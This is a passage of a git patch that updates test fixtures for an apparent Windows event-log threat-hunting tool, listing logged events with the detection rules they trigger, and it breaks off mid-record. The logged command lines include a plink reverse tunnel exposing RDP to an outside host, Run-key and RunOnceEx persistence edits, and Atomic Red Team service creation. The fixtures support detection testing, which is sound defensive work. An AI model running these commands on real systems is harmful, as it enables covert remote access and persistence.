From d42accc3f25eb69a637dcf9b63ce4076d8b77ecd Mon Sep 17 00:00:00 2001 From: dorgja Date: Fri, 7 Jan 2022 14:31:38 +0000 Subject: [PATCH] updating search and hunt test yaml files as they have changed due to the we're now processing the event logs --- e2e/hunt_expected.json | 2 +- e2e/search_expected.yml | 1676 +++++++++++++++++---------------------- 2 files changed, 717 insertions(+), 961 deletions(-) diff --git a/e2e/hunt_expected.json b/e2e/hunt_expected.json index a6796b3..bd5d4a6 100644 --- a/e2e/hunt_expected.json +++ b/e2e/hunt_expected.json @@ -1 +1 @@ -[{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":1102,"EventRecordID":227693,"Execution":{"#attributes":{"ProcessID":820,"ThreadID":608}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-02-13T18:01:41.593830Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"},"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0xaf855","SubjectUserName":"admin01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1108"}}}}},{"detection":["Exfiltration and Tunneling Tools Execution"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"","NewProcessId":"0xcfc","NewProcessName":"C:\\Users\\user01\\Desktop\\plink.exe","ProcessId":"0xe60","SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x2ed80","SubjectUserName":"user01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1106","TokenElevationType":"%%1936"},"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":4688,"EventRecordID":227714,"Execution":{"#attributes":{"ProcessID":4,"ThreadID":56}},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider":{"#attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"}},"Security":null,"Task":13312,"TimeCreated":{"#attributes":{"SystemTime":"2019-02-13T18:03:28.318440Z"}},"Version":1}}}},{"detection":["Exfiltration and Tunneling Tools Execution"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test","Company":"Simon Tatham","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Command-line SSH, Telnet, and Rlogin client","FileVersion":"Release 0.70","Hashes":"SHA1=7806AD24F669CD8BB9EBE16F87E90173047F8EE4","Image":"C:\\Users\\IEUser\\Desktop\\plink.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-D6AB-5C67-0000-002056660200","LogonId":"0x26656","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-D92A-5C67-0000-0010CB580900","ParentProcessId":3904,"ProcessGuid":"365ABB72-DFAD-5C67-0000-0010E0811500","ProcessId":2312,"Product":"PuTTY suite","RuleName":"","TerminalSessionId":1,"User":"PC01\\IEUser","UtcTime":"2019-02-16 10:02:21.934"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1940899,"Execution":{"#attributes":{"ProcessID":1728,"ThreadID":412}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-02-16T10:02:21.934438Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-07-19 14:43:46.619","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\phvj2yfb\\phvj2yfb.dll","UtcTime":"2019-07-19 14:43:46.619"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":3575,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:43:46.623217Z"}},"Version":2}}}},{"detection":["New Service Creation"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"sc.exe create AtomicTestService binPath= C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Service Control Manager Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF","Image":"C:\\Windows\\System32\\sc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"sc.exe create AtomicTestService binPath= C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D738-5D31-0000-001046A02600","ParentProcessId":4216,"ProcessGuid":"747F3D96-D738-5D31-0000-001098A22600","ProcessId":1700,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence or Exec - Services Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:08.181"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3577,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:08.185344Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:08.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3578,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:08.221461Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ImagePath","UtcTime":"2019-07-19 14:44:08.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3579,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:08.240767Z"}},"Version":2}}}},{"detection":["Stop Windows Service"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"sc.exe stop AtomicTestService","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Service Control Manager Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF","Image":"C:\\Windows\\System32\\sc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"sc.exe stop AtomicTestService\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D739-5D31-0000-00104CB72600","ParentProcessId":5000,"ProcessGuid":"747F3D96-D739-5D31-0000-0010B6B92600","ProcessId":980,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence or Exec - Services Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:09.172"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3584,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:09.176040Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:09.291"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3587,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:09.310810Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000002)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:26.166"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3589,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:26.222431Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ImagePath","UtcTime":"2019-07-19 14:44:26.166"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3590,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:26.246190Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:47.416"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3592,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:49.679320Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Reg Add RUN Key"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D765-5D31-0000-001027B72800","ProcessId":6584,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:53.201"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3593,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:53.219598Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Direct Autorun Keys Modification","Reg Add RUN Key"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D765-5D31-0000-001027B72800","ParentProcessId":6584,"ProcessGuid":"747F3D96-D765-5D31-0000-001086B92800","ProcessId":2068,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:53.244"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3594,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:53.258049Z"}},"Version":5}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Path\\AtomicRedTeam.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D765-5D31-0000-001086B92800","ProcessId":2068,"RuleName":"Persistence - via Run key","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Atomic Red Team","UtcTime":"2019-07-19 14:44:53.261"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3595,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:53.292455Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D765-5D31-0000-0010D7BD2800","ProcessId":5824,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:53.314"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3596,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:53.330492Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D765-5D31-0000-0010D7BD2800","ParentProcessId":5824,"ProcessGuid":"747F3D96-D765-5D31-0000-001022C02800","ProcessId":2912,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:53.337"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3597,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:53.349171Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Reg Add RUN Key"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \" C:\\Path\\AtomicRedTeam.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D772-5D31-0000-0010BEE52800","ProcessId":3216,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:06.056"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3600,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:45:06.075725Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Direct Autorun Keys Modification","Reg Add RUN Key"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d C:\\Path\\AtomicRedTeam.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \" C:\\Path\\AtomicRedTeam.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D772-5D31-0000-0010BEE52800","ParentProcessId":3216,"ProcessGuid":"747F3D96-D772-5D31-0000-001010E82800","ProcessId":3772,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:06.132"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3601,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:45:06.137175Z"}},"Version":5}}}},{"detection":["Godmode Sigma 